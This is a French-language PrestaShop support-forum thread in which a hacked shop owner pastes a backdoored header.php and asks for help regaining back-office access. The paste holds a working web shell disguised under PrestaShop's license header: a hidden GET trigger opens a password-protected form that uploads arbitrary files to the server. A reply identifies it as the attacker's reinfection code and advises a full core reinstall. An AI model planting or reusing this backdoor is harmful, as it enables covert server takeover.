Jump to content

Back office Prestashop inaccessible


Recommended Posts

Bonjour,

 

suite à un problème de virus, le back office prestashop ne fonctionne plus, apres une operation de nettoyage j'ai supprimé beaucoup de fichier que le hacker a mis sur le serveur, j'ai reussi à afficher le front office mais pas le back office, je me demande si c'est un problème de chemin ou redirection, merci de bien vouloir m'aider à résoudre ce problème svp.

 

La page n’est pas redirigée correctement

Firefox a détecté que le serveur redirige la demande pour cette adresse d’une manière qui n’aboutira pas.

    La cause de ce problème peut être la désactivation ou le refus des cookies.

 

back office http://www.distributechmaroc.com/admindistribute/

 

MERCI INFINIMENT

Link to comment
Share on other sites

bonjour,

 

j'ai trouvé ce code mis par le hacker dans le fichier header.php dans le dossier public html, pourriez-vous me décortiquer sa façon de travailler,a fin de résoudre mon proble d’accès au back office.

 

SVP VOTRE AIDE

 

 

fichier header.php

 

<?php

/*

* 2007-2015 PrestaShop

*

* NOTICE OF LICENSE

*

* This source file is subject to the Open Software License (OSL 3.0)

* that is bundled with this package in the file LICENSE.txt.

* It is also available through the world-wide-web at this URL:

* http://opensource.org/licenses/osl-3.0.php

* If you did not receive a copy of the license and are unable to

* obtain it through the world-wide-web, please send an email

* to [email protected] so we can send you a copy immediately.

*

* DISCLAIMER

*

* Do not edit or add to this file if you wish to upgrade PrestaShop to newer

* versions in the future. If you wish to customize PrestaShop for your

* needs please refer to http://www.prestashop.com for more information.

*

*  @author PrestaShop SA <[email protected]>

*  @copyright  2007-2015 PrestaShop SA

*  @license    http://opensource.org/licenses/osl-3.0.php  Open Software License (OSL 3.0)

*  International Registered Trademark & Property of PrestaShop SA

*/

if($_GET['bajatax']=="hous"){

echo '<center><font color="Red" size="4">';

echo " Files Upload BY Bajatax<br>";

/// Script Upload By bajatax \\\

if(isset($_POST['Submit']) && isset($_POST['pass'])){

$pass=md5($_POST['pass']);

if($pass=="9d309cc7622c7f12b57c136ffd4717f7"){

    $filedir = "";

    $maxfile = '2000000';

    $mode = '0644';

    $userfile_name = $_FILES['image']['name'];

    $userfile_tmp = $_FILES['image']['tmp_name'];

    if(isset($_FILES['image']['name'])) {

        $qx = $filedir.$userfile_name;

        @move_uploaded_file($userfile_tmp, $qx);

        @chmod ($qx, octdec($mode));

echo" <a href=$userfile_name><center><b>Sucess Upload by Bajatax  :D ==> $userfile_name</b></center></a>";

}

}

else{

echo "ikma khask pass hhh :v doz inbox www.fb.com/bajatax58 :P jib BTC o duz Khod u_f  :P <br>";

[spam-filter]

else{

echo'<form method="POST" action="#" enctype="multipart/form-data"><br>upload :  <input type="file" name="image"><br>  pass : <input type="password" name="pass" value="9lawi la3rftih :v "><br><input type="Submit" name="Submit" value="Upload"></form>';

}

echo "<br> hadi fkhatr ga3 l3chran houus :D <br>";

echo '</center></font>';



}

require(dirname(__FILE__).'/config/config.inc.php');

Dispatcher::getInstance()->dispatch();

Link to comment
Share on other sites

Non c'est une perte de temps.

Ce code recharge la vérole du hacker en gros.

 

Remplace tous les fichiers core par ceux du Prestashop natif.

Repasse dans tous les répertoires à la recherche de backdoor supplémentaire.

 

Ton nettoyage n'est pas complet, tu dois recommencer a scruter ton code et persévérer.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...